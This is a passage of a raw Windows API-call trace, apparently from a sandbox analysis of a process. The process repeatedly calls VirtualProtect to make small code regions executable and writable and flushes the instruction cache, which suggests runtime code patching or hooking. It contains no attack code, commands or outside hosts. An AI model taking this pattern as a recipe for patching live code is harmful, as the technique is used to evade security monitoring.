(hProcess=0xffffffff, lpBaseAddress=0xf4d5759, dwSize=0x2) returned 1 [0095.781] GetCurrentProcess () returned 0xffffffff [0095.781] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5778, dwSize=0x14) returned 1 [0095.781] VirtualProtect (in: lpAddress=0xf4d5778, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.782] GetCurrentProcess () returned 0xffffffff [0095.782] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5779, dwSize=0x2) returned 1 [0095.782] GetCurrentProcess () returned 0xffffffff [0095.782] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5798, dwSize=0x14) returned 1 [0095.782] VirtualProtect (in: lpAddress=0xf4d5798, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.783] GetCurrentProcess () returned 0xffffffff [0095.783] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5799, dwSize=0x2) returned 1 [0095.784] GetAsyncKeyState (vKey=3) returned 0 [0095.784] VarCmp (pvarLeft=0x197dcc, pvarRight=0x197dbc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0095.784] CRetailMalloc_Alloc () returned 0xcc06370 [0095.784] memcpy (in: _Dst=0xb2a5168, _Src=0x1976bc, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0095.784] memcpy (in: _Dst=0xcc06390, _Src=0x197724, _Size=0x18 | out: _Dst=0xcc06390) returned 0xcc06390 [0095.784] CRetailMalloc_Realloc () returned 0xcc06370 [0095.784] CRetailMalloc_Free () returned 0x1 [0095.784] GetCurrentProcess () returned 0xffffffff [0095.784] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16764, dwSize=0x14) returned 1 [0095.784] VirtualProtect (in: lpAddress=0xcd16764, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.785] GetCurrentProcess () returned 0xffffffff [0095.785] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16765, dwSize=0x2) returned 1 [0095.785] GetCurrentProcess () returned 0xffffffff [0095.785] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16784, dwSize=0x14) returned 1 [0095.785] VirtualProtect (in: lpAddress=0xcd16784, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.786] GetCurrentProcess () returned 0xffffffff [0095.786] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16785, dwSize=0x2) returned 1 [0095.786] GetCurrentProcess () returned 0xffffffff [0095.786] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167a4, dwSize=0x14) returned 1 [0095.786] VirtualProtect (in: lpAddress=0xcd167a4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.787] GetCurrentProcess () returned 0xffffffff [0095.787] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167a5, dwSize=0x2) returned 1 [0095.787] GetCurrentProcess () returned 0xffffffff [0095.787] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167c4, dwSize=0x14) returned 1 [0095.787] VirtualProtect (in: lpAddress=0xcd167c4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.787] GetCurrentProcess () returned 0xffffffff [0095.787] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167c5, dwSize=0x2) returned 1 [0095.787] GetCurrentProcess () returned 0xffffffff [0095.787] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167e4, dwSize=0x14) returned 1 [0095.787] VirtualProtect (in: lpAddress=0xcd167e4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.788] GetCurrentProcess () returned 0xffffffff [0095.788] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167e5, dwSize=0x2) returned 1 [0095.788] GetCurrentProcess () returned 0xffffffff [0095.788] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16804, dwSize=0x14) returned 1 [0095.788] VirtualProtect (in: lpAddress=0xcd16804, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.789] GetCurrentProcess () returned 0xffffffff [0095.789] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16805, dwSize=0x2) returned 1 [0095.789] GetCurrentProcess () returned 0xffffffff [0095.789] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16824, dwSize=0x14) returned 1 [0095.789] VirtualProtect (in: lpAddress=0xcd16824, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.790] GetCurrentProcess () returned 0xffffffff [0095.790] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16825, dwSize=0x2) returned 1 [0095.790] GetCurrentProcess () returned 0xffffffff [0095.790] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16844, dwSize=0x14) returned 1 [0095.790] VirtualProtect (in: lpAddress=0xcd16844, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.791] GetCurrentProcess () returned 0xffffffff [0095.791] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16845, dwSize=0x2) returned 1 [0095.791] GetCurrentProcess () returned 0xffffffff [0095.791] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16864, dwSize=0x14) returned 1 [0095.791] VirtualProtect (in: lpAddress=0xcd16864, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.792] GetCurrentProcess () returned 0xffffffff [0095.792] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16865, dwSize=0x2) returned 1 [0095.792] GetCurrentProcess () returned 0xffffffff [0095.792] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16884, dwSize=0x14) returned 1 [0095.792] VirtualProtect (in: lpAddress=0xcd16884, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.792] GetCurrentProcess () returned 0xffffffff [0095.792] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16885, dwSize=0x2) returned 1 [0095.793] GetCurrentProcess () returned 0xffffffff [0095.793] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd168a4, dwSize=0x14) returned 1 [0095.793] VirtualProtect (in: lpAddress=0xcd168a4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.793] GetCurrentProcess () returned 0xffffffff [0095.793] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd168a5, dwSize=0x2) returned 1 [0095.793] GetCurrentProcess () returned 0xffffffff [0095.793] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd168c4, dwSize=0x14) returned 1 [0095.793] VirtualProtect (in: lpAddress=0xcd168c4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.794] GetCurrentProcess () returned 0xffffffff [0095.794] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd168c5, dwSize=0x2) returned 1 [0095.794] GetCurrentProcess () returned 0xffffffff [0095.794] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c38, dwSize=0x14) returned 1 [0095.794] VirtualProtect (in: lpAddress=0xf4d2c38, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.795] GetCurrentProcess () returned 0xffffffff [0095.795] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c39, dwSize=0x2) returned 1 [0095.795] GetCurrentProcess () returned 0xffffffff [0095.795] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c58, dwSize=0x14) returned 1 [0095.795] VirtualProtect (in: lpAddress=0xf4d2c58, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.796] GetCurrentProcess () returned 0xffffffff [0095.796] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c59, dwSize=0x2) returned 1 [0095.796] GetCurrentProcess () returned 0xffffffff [0095.796] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c78, dwSize=0x14) returned 1 [0095.796] VirtualProtect (in: lpAddress=0xf4d2c78, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.797] GetCurrentProcess () returned 0xffffffff [0095.797] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c79, dwSize=0x2) returned 1 [0095.797] GetCurrentProcess () returned 0xffffffff [0095.797] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c98, dwSize=0x14) returned 1 [0095.797] VirtualProtect (in: lpAddress=0xf4d2c98, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.798] GetCurrentProcess () returned 0xffffffff [0095.798] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c99, dwSize=0x2) returned 1 [0095.798] GetCurrentProcess () returned 0xffffffff [0095.798] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cb8, dwSize=0x14) returned 1 [0095.798] VirtualProtect (in: lpAddress=0xf4d2cb8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.798] GetCurrentProcess () returned 0xffffffff [0095.798] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cb9, dwSize=0x2) returned 1 [0095.798] GetCurrentProcess () returned 0xffffffff [0095.799] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cd8, dwSize=0x14) returned 1 [0095.799] VirtualProtect (in: lpAddress=0xf4d2cd8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.799] GetCurrentProcess () returned 0xffffffff [0095.799] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cd9, dwSize=0x2) returned 1 [0095.799] GetCurrentProcess () returned 0xffffffff [0095.799] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cf8, dwSize=0x14) returned 1 [0095.799] VirtualProtect (in: lpAddress=0xf4d2cf8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.800] GetCurrentProcess () returned 0xffffffff [0095.800] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cf9, dwSize=0x2) returned 1 [0095.800] GetCurrentProcess () returned 0xffffffff [0095.800] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d18, dwSize=0x14) returned 1 [0095.800] VirtualProtect (in: lpAddress=0xf4d2d18, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.801] GetCurrentProcess () returned 0xffffffff [0095.801] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d19, dwSize=0x2) returned 1 [0095.801] GetCurrentProcess () returned 0xffffffff [0095.801] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d38, dwSize=0x14) returned 1 [0095.801] VirtualProtect (in: lpAddress=0xf4d2d38, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.802] GetCurrentProcess () returned 0xffffffff [0095.802] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d39, dwSize=0x2) returned 1 [0095.802] GetCurrentProcess () returned 0xffffffff [0095.802] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d58, dwSize=0x14) returned 1 [0095.802] VirtualProtect (in: lpAddress=0xf4d2d58, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.803] GetCurrentProcess () returned 0xffffffff [0095.803] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d59, dwSize=0x2) returned 1 [0095.803] GetCurrentProcess () returned 0xffffffff [0095.803] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d78, dwSize=0x14) returned 1 [0095.803] VirtualProtect (in: lpAddress=0xf4d2d78, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.803] GetCurrentProcess () returned 0xffffffff [0095.804] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d79, dwSize=0x2) returned 1 [0095.804] GetCurrentProcess () returned 0xffffffff [0095.804] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d98, dwSize=0x14) returned 1 [0095.804] VirtualProtect (in: lpAddress=0xf4d2d98, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.804] GetCurrentProcess () returned 0xffffffff [0095.809] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d99, dwSize=0x2) returned 1 [0095.809] GetCurrentProcess () returned 0xffffffff [0095.809] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2db8, dwSize=0x14) returned 1 [0095.810] VirtualProtect (in: lpAddress=0xf4d2db8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.810] GetCurrentProcess () returned 0xffffffff [0095.810] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2db9, dwSize=0x2) returned 1 [0095.810] GetCurrentProcess () returned 0xffffffff [0095.811] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2dd8, dwSize=0x14) returned 1 [0095.811] VirtualProtect (in: lpAddress=0xf4d2dd8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.811] GetCurrentProcess () returned 0xffffffff [0095.812] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2dd9, dwSize=0x2) returned 1 [0095.812] GetCurrentProcess () returned 0xffffffff [0095.812] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2df8, dwSize=0x14) returned 1 [0095.812] VirtualProtect (in: lpAddress=0xf4d2df8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.813] GetCurrentProcess () returned 0xffffffff [0095.813] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2df9, dwSize=0x2) returned 1 [0095.813] GetCurrentProcess () returned 0xffffffff [0095.813] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2e18, dwSize=0x14) returned 1 [0095.813] VirtualProtect (in: lpAddress=0xf4d2e18, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.813] GetCurrentProcess () returned 0xffffffff [0095.813] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2e19, dwSize=0x2) returned 1 [0095.813] GetCurrentProcess () returned 0xffffffff [0095.813] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5758, dwSize=0x14) returned 1 [0095.813] VirtualProtect (in: lpAddress=0xf4d5758, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.814] GetCurrentProcess () returned 0xffffffff [0095.814] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5759, dwSize=0x2) returned 1 [0095.814] GetCurrentProcess () returned 0xffffffff [0095.814] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5778, dwSize=0x14) returned 1 [0095.814] VirtualProtect (in: lpAddress=0xf4d5778, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.815] GetCurrentProcess () returned 0xffffffff [0095.815] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5779, dwSize=0x2) returned 1 [0095.815] GetCurrentProcess () returned 0xffffffff [0095.815] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5798, dwSize=0x14) returned 1 [0095.815] VirtualProtect (in: lpAddress=0xf4d5798, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.816] GetCurrentProcess () returned 0xffffffff [0095.816] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5799, dwSize=0x2) returned 1 [0095.817] GetAsyncKeyState (vKey=3) returned 0 [0095.817] VarCmp (pvarLeft=0x197dcc, pvarRight=0x197dbc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0095.817] CRetailMalloc_Alloc () returned 0xcc063d0 [0095.817] memcpy (in: _Dst=0xb2a5168, _Src=0x1976bc, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0095.817] memcpy (in: _Dst=0xcc063f0, _Src=0x197724, _Size=0x18 | out: _Dst=0xcc063f0) returned 0xcc063f0 [0095.817] CRetailMalloc_Realloc () returned 0xcc063d0 [0095.817] CRetailMalloc_Free () returned 0x1 [0095.818] GetCurrentProcess () returned 0xffffffff [0095.818] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16764, dwSize=0x14) returned 1 [0095.818] VirtualProtect (in: lpAddress=0xcd16764, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.819] GetCurrentProcess () returned 0xffffffff [0095.819] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16765, dwSize=0x2) returned 1 [0095.819] GetCurrentProcess () returned 0xffffffff [0095.819] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16784, dwSize=0x14) returned 1 [0095.819] VirtualProtect (in: lpAddress=0xcd16784, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.820] GetCurrentProcess () returned 0xffffffff [0095.820] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16785, dwSize=0x2) returned 1 [0095.820] GetCurrentProcess () returned 0xffffffff [0095.820] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167a4, dwSize=0x14) returned 1 [0095.820] VirtualProtect (in: lpAddress=0xcd167a4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.820] GetCurrentProcess () returned 0xffffffff [0095.820] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167a5, dwSize=0x2) returned 1 [0095.821] GetCurrentProcess () returned 0xffffffff [0095.821] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167c4, dwSize=0x14) returned 1 [0095.821] VirtualProtect (in: lpAddress=0xcd167c4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.821] GetCurrentProcess () returned 0xffffffff [0095.821] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167c5, dwSize=0x2) returned 1 [0095.821] GetCurrentProcess () returned 0xffffffff [0095.821] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167e4, dwSize=0x14) returned 1 [0095.822] VirtualProtect (in: lpAddress=0xcd167e4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.822] GetCurrentProcess () returned 0xffffffff [0095.822] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167e5, dwSize=0x2) returned 1 [0095.822] GetCurrentProcess () returned 0xffffffff [0095.822] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16804, dwSize=0x14) returned 1 [0095.822] VirtualProtect (in: lpAddress=0xcd16804, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.823] GetCurrentProcess () returned 0xffffffff [0095.823] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16805, dwSize=0x2) returned 1 [0095.823] GetCurrentProcess () returned 0xffffffff [0095.823] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16824, dwSize=0x14) returned 1 [0095.823] VirtualProtect (in: lpAddress=0xcd16824, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.824] GetCurrentProcess () returned 0xffffffff [0095.824] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16825, dwSize=0x2) returned 1 [0095.824] GetCurrentProcess () returned 0xffffffff [0095.824] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16844, dwSize=0x14) returned 1 [0095.824] VirtualProtect (in: lpAddress=0xcd16844, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.825] GetCurrentProcess () returned 0xffffffff [0095.825] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16845, dwSize=0x2) returned 1 [0095.825] GetCurrentProcess () returned 0xffffffff [0095.825] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16864, dwSize=0x14) returned 1 [0095.825] VirtualProtect (in: lpAddress=0xcd16864, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.826] GetCurrentProcess () returned 0xffffffff [0095.826] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16865, dwSize=0x2) returned 1 [0095.826] GetCurrentProcess () returned 0xffffffff [0095.826] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16884, dwSize=0x14) returned 1 [0095.826] VirtualProtect (in: lpAddress=0xcd16884, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.826] GetCurrentProcess () returned 0xffffffff [0095.826] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16885, dwSize=0x2) returned 1 [0095.826] GetCurrentProcess () returned 0xffffffff [0095.826] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd168a4, dwSize=0x14) returned 1 [0095.826] VirtualProtect (in: lpAddress=0xcd168a4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.827] GetCurrentProcess () returned 0xffffffff [0095.827] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd168a5, dwSize=0x2) returned 1 [0095.827] GetCurrentProcess () returned 0xffffffff [0095.827] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd168c4, dwSize=0x14) returned 1 [0095.827] VirtualProtect (in: lpAddress=0xcd168c4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.828] GetCurrentProcess () returned 0xffffffff [0095.828] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd168c5, dwSize=0x2) returned 1 [0095.828] GetCurrentProcess () returned 0xffffffff [0095.828] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c38, dwSize=0x14) returned 1 [0095.828] VirtualProtect (in: lpAddress=0xf4d2c38, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.829] GetCurrentProcess () returned 0xffffffff [0095.829] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c39, dwSize=0x2) returned 1 [0095.829] GetCurrentProcess () returned 0xffffffff [0095.829] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c58, dwSize=0x14) returned 1 [0095.829] VirtualProtect (in: lpAddress=0xf4d2c58, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.830] GetCurrentProcess () returned 0xffffffff [0095.830] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c59, dwSize=0x2) returned 1 [0095.830] GetCurrentProcess () returned 0xffffffff [0095.830] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c78, dwSize=0x14) returned 1 [0095.830] VirtualProtect (in: lpAddress=0xf4d2c78, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.830] GetCurrentProcess () returned 0xffffffff [0095.830] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c79, dwSize=0x2) returned 1 [0095.830] GetCurrentProcess () returned 0xffffffff [0095.830] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c98, dwSize=0x14) returned 1 [0095.830] VirtualProtect (in: lpAddress=0xf4d2c98, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.848] GetCurrentProcess () returned 0xffffffff [0095.848] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c99, dwSize=0x2) returned 1 [0095.848] GetCurrentProcess () returned 0xffffffff [0095.848] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cb8, dwSize=0x14) returned 1 [0095.848] VirtualProtect (in: lpAddress=0xf4d2cb8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.849] GetCurrentProcess () returned 0xffffffff [0095.849] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cb9, dwSize=0x2) returned 1 [0095.849] GetCurrentProcess () returned 0xffffffff [0095.849] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cd8, dwSize=0x14) returned 1 [0095.849] VirtualProtect (in: lpAddress=0xf4d2cd8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.850] GetCurrentProcess () returned 0xffffffff [0095.850] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cd9, dwSize=0x2) returned 1 [0095.850] GetCurrentProcess () returned 0xffffffff [0095.850] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cf8, dwSize=0x14) returned 1 [0095.850] VirtualProtect (in: lpAddress=0xf4d2cf8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.851] GetCurrentProcess () returned 0xffffffff [0095.851] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cf9, dwSize=0x2) returned 1 [0095.851] GetCurrentProcess () returned 0xffffffff [0095.851] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d18, dwSize=0x14) returned 1 [0095.851] VirtualProtect (in: lpAddress=0xf4d2d18, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.852] GetCurrentProcess () returned 0xffffffff [0095.852] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d19, dwSize=0x2) returned 1 [0095.852] GetCurrentProcess () returned 0xffffffff [0095.852] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d38, dwSize=0x14) returned 1 [0095.852] VirtualProtect (in: lpAddress=0xf4d2d38, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.853] GetCurrentProcess () returned 0xffffffff [0095.853] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d39, dwSize=0x2) returned 1 [0095.853] GetCurrentProcess () returned 0xffffffff [0095.853] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d58, dwSize=0x14) returned 1 [0095.853] VirtualProtect (in: 